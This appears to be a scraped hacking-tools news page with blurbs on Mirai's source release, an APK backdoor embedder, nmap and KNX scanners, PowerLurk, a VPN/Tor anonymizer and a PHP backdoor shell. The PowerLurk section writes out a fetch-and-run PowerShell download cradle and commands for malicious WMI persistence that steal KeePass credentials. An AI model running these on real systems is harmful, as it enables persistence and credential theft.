Mirai Source Code Released

The IoT Botnet Mirai’s source code has been published online by its author along with configuration and set-up details. Naturally, web security analysts are expecting a series of online attacks from malicious threat actors. The reason behind their concerns is that this code can easily convert any hackable, that is, unsecured or unprotected devices like the routers, web cameras and phone, etc., into DDoS Bots. These bots can then be used to attack websites and to take them offline.

Source IoT Botnet Mirai’s

Read More

Modern mass media manipulation methods are types of distraction - Media Manipulation

Media manipulation is a series of related techniques in which partisans create an image or argument that favours their particular interests. Such tactics may include the use of logical fallacies and propaganda techniques, and often involve the suppression of information or points of view by crowding them out, by inducing other people or groups of people to stop listening to certain arguments, or by simply diverting attention elsewhere. In Propaganda: The Formation of Men's Attitudes, Jacques Ellul writes that public opinion can only express itself through channels which are provided by the mass media of communication – without which there could be no propaganda. It is used within public relations, propaganda, marketing, etc. While the objective for each context is quite different, the broad techniques are often similar.

watch the video

By OffSec

Read More

An utility like pkg-audit for Arch Linux - arch-audit

An utility like pkg-audit for Arch Linux. Based on Arch CVE Monitoring Team data

Uses data collected by the awesome Arch CVE Monitoring Team .

Installation

From AUR
The PKGBUILD is available on AUR .
After the installation just execute arch-audit .

From sources

git clone https://github.com/ilpianista/arch-audit
cd arch-audit
cargo build
cargo run

Example output

$ arch-audit
Package libwmf is affected by ["CVE-2009-1364", "CVE-2006-3376", "CVE-2007-0455", "CVE-2007-2756", "CVE-2007-3472", "CVE-2007-3473", "CVE-2007-3477", "CVE-2009-3546", "CVE-2015-0848", "CVE-2015-4588", "CVE-2015-4695", "CVE-2015-4696"]. VULNERABLE!
Package libtiff is affected by ["CVE-2016-5875", "CVE-2016-5314", "CVE-2016-5315", "CVE-2016-5316", "CVE-2016-5317", "CVE-2016-5320", "CVE-2016-5321", "CVE-2016-5322", "CVE-2016-5323", "CVE-2016-5102", "CVE-2016-3991", "CVE-2016-3990", "CVE-2016-3945", "CVE-2016-3658", "CVE-2016-3634", "CVE-2016-3633", "CVE-2016-3632", "CVE-2016-3631", "CVE-2016-3625", "CVE-2016-3624", "CVE-2016-3623", "CVE-2016-3622", "CVE-2016-3621", "CVE-2016-3620", "CVE-2016-3619", "CVE-2016-3186", "CVE-2015-8668", "CVE-2015-7313", "CVE-2014-8130", "CVE-2014-8127", "CVE-2010-2596", "CVE-2016-6223"]. VULNERABLE!
Package libtiff is affected by ["CVE-2015-7554", "CVE-2015-8683"]. VULNERABLE!
Package jasper is affected by ["CVE-2015-8751"]. VULNERABLE!
Package jasper is affected by ["CVE-2015-5221"]. VULNERABLE!
Package jasper is affected by ["CVE-2015-5203"]. VULNERABLE!
Package lib32-openssl is affected by ["CVE-2016-2177", "CVE-2016-2178", "CVE-2016-2179", "CVE-2016-2180", "CVE-2016-2181", "CVE-2016-2182", "CVE-2016-2183", "CVE-2016-6302", "CVE-2016-6303", "CVE-2016-6304", "CVE-2016-6306"]. Update to 1:1.0.2.i-1!
Package wireshark-cli is affected by ["CVE-2016-7180", "CVE-2016-7175", "CVE-2016-7176", "CVE-2016-7177", "CVE-2016-7178", "CVE-2016-7179"]. Update to 2.2.0-1!
Package wpa_supplicant is affected by ["CVE-2016-4477", "CVE-2016-4476"]. VULNERABLE!
Package openssl is affected by ["CVE-2016-2177", "CVE-2016-2178", "CVE-2016-2179", "CVE-2016-2180", "CVE-2016-2181", "CVE-2016-2182", "CVE-2016-2183", "CVE-2016-6302", "CVE-2016-6303", "CVE-2016-6304", "CVE-2016-6306"]. Update to 1.0.2.i-1!
Package crypto++ is affected by ["CVE-2016-7420"]. VULNERABLE!
Package bzip2 is affected by ["CVE-2016-3189"]. VULNERABLE!
Package libimobiledevice is affected by ["CVE-2016-5104"]. VULNERABLE!
Package libusbmuxd is affected by ["CVE-2016-5104"]. VULNERABLE!
Package gdk-pixbuf2 is affected by ["CVE-2016-6352"]. VULNERABLE!

$ arch-audit --upgradable --quiet
wireshark-cli>=2.2.0-1
openssl>=1.0.2.i-1
lib32-openssl>=1:1.0.2.i-1

$ arch-audit -uf "%n|%c"
openssl|CVE-2016-2177,CVE-2016-2178,CVE-2016-2179,CVE-2016-2180,CVE-2016-2181,CVE-2016-2182,CVE-2016-2183,CVE-2016-6302,CVE-2016-6303,CVE-2016-6304,CVE-2016-6306
wireshark-cli|CVE-2016-7180,CVE-2016-7175,CVE-2016-7176,CVE-2016-7177,CVE-2016-7178,CVE-2016-7179
lib32-openssl|CVE-2016-2177,CVE-2016-2178,CVE-2016-2179,CVE-2016-2180,CVE-2016-2181,CVE-2016-2182,CVE-2016-2183,CVE-2016-6302,CVE-2016-6303,CVE-2016-6304,CVE-2016-6306

Download arch-audit

Read More

Android APK Backdoor Embedder - Spade

Quick and handy APK backdoor embedder with metasploit android payloads.

Requirements

• metasploit

Installation and execution
Then you can download smap by cloning the Git repository:

git clone https://github.com/suraj-root/spade.git
cd spade/
./spade.py

Demo video


Video YouTube:

Download Spade

Read More

Exploit Network and Gathering Information with Nmap - Dracnmap

Dracnmap is an open source program which is using to exploit the network and gathering information with nmap help. Nmap command comes with lots of options that can make the utility more robust and difficult to follow for new users. Hence Dracnmap is designed to perform fast scaning with the utilizing script engine of nmap and nmap can perform various automatic scanning techniques with the advanced commands.

Screenshot

Getting Started

git clone https://github.com/Screetsec/Dracnmap.git
cd Dracnmap
chmod +x Dracnmap.sh
sudo ./Dracnmap.sh or sudo su ./Dracnmap.sh

Requirements

• A linux operating system. We recommend Kali Linux 2 or Kali 2016.1 rolling / Cyborg / Parrot / Dracos / BackTrack / Backbox / and another operating system ( linux )
  
• Must install nmap
  

Tutorial
you can visit my channel : https://www.youtube.com/channel/UCpK9IXzLMfVFp9NUfDzxFfw

Credits

• Thanks to allah and Screetsec [ Edo -maland- ]
• Dracos Linux from Scratch Indonesia ( Awesome Penetration os ), you can see in http://dracos-linux.org/
• Offensive Security for the awesome OS ( http://www.offensive-security.com/ )
• http://www.kali.org/ "
  
• Jack Wilder admin in http://www.linuxsec.org
• And another open sources tool in github
• Uptodate new tools hacking visit http://www.kitploit.com
• My Friends ( Boy Suganda )

Download Dracnmap

Read More

KNXnet/IP scanning and auditing tool for KNX home automation installations - KNXmap

A tool for scanning and auditing KNXnet/IP gateways on IP driven networks. KNXnet/IP defines Ethernet as physical communication media for KNX (EN 50090, ISO/IEC 14543). KNXmap also allows to scan for devices on the KNX bus via KNXnet/IP gateways. In addition to scanning, KNXmap supports other modes to interact with KNX gateways like monitor bus messages or write arbitrary values to group addresses.

Compatibility

KNXmap requires Python 3.3 or newer. There are no external dependencies, everything is included in the standard library.

Note : Users of Python 3.3 need to install the asyncio module from PyPI .

Usage
Invoke knxmap.py locally or install it:

python setup.py install

Documentation
The documentation is available in the repository wiki .

Hacking
Enable full debugging and verbosity for development:

PYTHONASYNCIODEBUG=1 knxmap.py -v scan 192.168.178.20 1.1.0-1.1.6 --bus-info

Download KNXmap

Read More

Malicious WMI Events using PowerShell - PowerLurk

PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions. The goal is to make WMI events easier to fire off during a penetration test or red team engagement. Please see my post Creeping on Users with WMI Events: Introducing PowerLurk for more detailed information: https://pentestarmoury.com/2016/07/13/151/

To use PowerLurk, you must import the PowerLurk.ps1 module into your instance of PowerShell. This can be done a couple of ways:

Import locally

    PS> powershell.exe -NoP -Exec ByPass -C Import-Module c:\\temp\\PowerLurk.ps1   

Download Cradle

    PS> powershell.exe -NoP -C "IEX (New-Object Net.WebClient).DownloadString('http://<IP>/PowerLurk.ps1'); Get-WmiEvent"   

Get-WmiEvent
By default, Get-WmiEvent queries WMI for all __FilterToConsumerBinding instances and associated __EventFilter, and __EventConsumer instances. Objects returned can be deleted by piping to Remove-WmiObject.
Return all active WMI event objects with the name 'RedTeamEvent'

    Get-WmiEvent -Name RedTeamEvent   

Delete 'RedTeamEvent' WMI event objects

    Get-WmiEvent -Name RedTeamEvent | Remove-WmiObject   

Register-MaliciousWmiEvent
This cmdlet is the core of PowerLurk. It takes a command, script, or scriptblock as the action and a precanned trigger then creates the WMI Filter, Consumer, and FilterToConsumerBinding required for a fully functional Permanent WMI Event Subscription. A number of WMI event triggers, or filters, are preconfigured. The trigger must be specified with the -Trigger parameter. There are three consumers to choose from, PermanentCommand, PermanentScript, and LocalScriptBLock. Example usage:
Write the notepad.exe process ID to C:\temp\log.txt whenever notepad.exe starts

    Register-MaliciousWmiEvent -EventName LogNotepad -PermanentCommand “cmd.exe /c echo %ProcessId% >> c:\\temp\\log.txt” -Trigger ProcessStart -ProcessName notepad.exe   

Cleanup Malicious WMI Event

    Get-WmiEvent -Name LogNotepad | Remove-WmiObject   

Add-KeeThiefLurker
creates a permanent WMI event that will execute KeeThief (See @Harmj0y's KeeThief at https://github.com/adaptivethreat/KeeThief ) 4 minutes after the 'keepass' process starts. This gives the target time to log into their KeePass database.
The KeeThief logic and its output are either stored in a custom WMI namespace and class or regsitry values. If a custom WMI namespace and class are selected, you have the option to expose that namespace so that it can be read remotely by 'Everyone'. Registry path and value names are customizable using the associated switches; however, this is optional as defaults are set. Example usage:
Add KeeThiefLurker event using WMI class storage

    Add-KeeThiefLurker -EventName KeeThief -WMI   

Query custom WMI class

    Get-WmiObject -Namespace root\software win32_WindowsUpdate -List   

Extract KeeThief output from WMI class

    [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($(Get-WmiObject -Namespace root\software win32_WindowsUpdate -List).Properties['Output'].value))   

Cleanup KeeThiefLurker

    Remove-KeeThiefLurker -EventName KeeThief -WMI   

Download PowerLurk

Read More

A bash script for anonymizing the public IP managing the connection to TOR and different VPNs providers - 4nonimizer

What is 4nonimizer?
It is a bash script for anonymizing the public IP used to browsing Internet, managing the connection to TOR network and to different VPNs providers (OpenVPN), whether free or paid. By default, it includes several pre-configured VPN connections to different peers (.ovpn files) and download the credentials. Also, it records each used IP that we use every 300 seconds in log files.
This script is enabled as a service in systemd systems and uses a default vpn (VPNBook) at system startup.

Installation
Download the repo using git, execute the command ./4nonimizer install in the directory, and follow the screen instructions, 4nonimizer will move to the directory /opt/ and installed as a service.
This script has full compatibility with Kali Linux, although it has been properly tested and should also work on other distributions like Debian, Ubuntu and Arch (Manjaro). However there could be some bugs, or unexpected performances (please comments if you find any!).

Options
Once installed 4nonymizer, enter the command 4nonimizer help to get the help, which shows all the available parameters:

Available VPNs
Currently it supports the following VPN providers:
- HideMyAss https://www.hidemyass.com/
- TorGuard https://torguard.net/
- VPNBook (by default) http://www.vpnbook.com/
- VPNGate http://www.vpngate.net/en/
- VPNMe https://www.vpnme.me/
- VPNKeys https://www.vpnkeys.com/

Install a new VPN
To install an additional vpn we have to use the following structure in order to the 4nonimizer be able to integrate and perform operations with it.
First, we have to create the following dir structure /vpn/ within 4nonimizer path:

In our example we create the folder /vpntest/ and within it placed all .ovpn files we have. If the files ovpn not have the certificate within each of them we put in the same folder as shown in the example certificate.crt .
In addition, we must place a file named pass.txt containing 2 lines: the first one with the username and the second one with the password, as shown below:

If we have correctly performed all steps when we execute the command 4nonimizer change_provider the menu will show our vpn:

As you can see in the picture, option [7] it is the vpn we've created.

Getting credencials and ovpn files automatically
If the VPN provider allows automation of credential and/or .ovpn files getting, 4nonimizer has standardized the following scripts names and locations:
- /opt/4nonimizer/vpn/provider/ vpn-get-pass.sh

- /opt/4nonimizer/vpn/provider/ vpn-get-ovpn.sh

4nonimizer automatically detect the presence of both scripts and indicate (Auto-pass Login) or (Auto-get OVPN) if applicable.

Extras
- Execute 'source 4nonimizer' to activate autocompletation of parameters.
- Copy .conkyrc in your home directory to load a 4nonimizer template and execute conky.

References
- http://www.hackplayers.com/2016/08/tuto-enmascarar-ip-linux-vpn-tor.html
- http://www.hackplayers.com/2016/10/4nonimizer-un-script-para-anonimizar-ip.html

Versions
- 1.0-beta codename .bye-world! 5/10/2016

Download 4nonimizer

Read More

Python Client with PHP Shell - tinyshell

python Client with php shell , allows to connect and send commands over current protocol using POST and GET Requests

Features

1. connect with direct session with no need for reverse connection .
2. support password protection .
3. can be binded to any file with no damage .
4. using GET/POST request with error handling .

Usage
the project contains of two files :

1. Remote shell python file : considered as Client to connect with target python remote shell.py url password
   
2. php shell php file : considered as php backdoor . password can be edited manually by modifing the code .
   

Credits
Lawrence Amer - Vulnerability Lab Researcher .

Video

Download tinyshell

Read More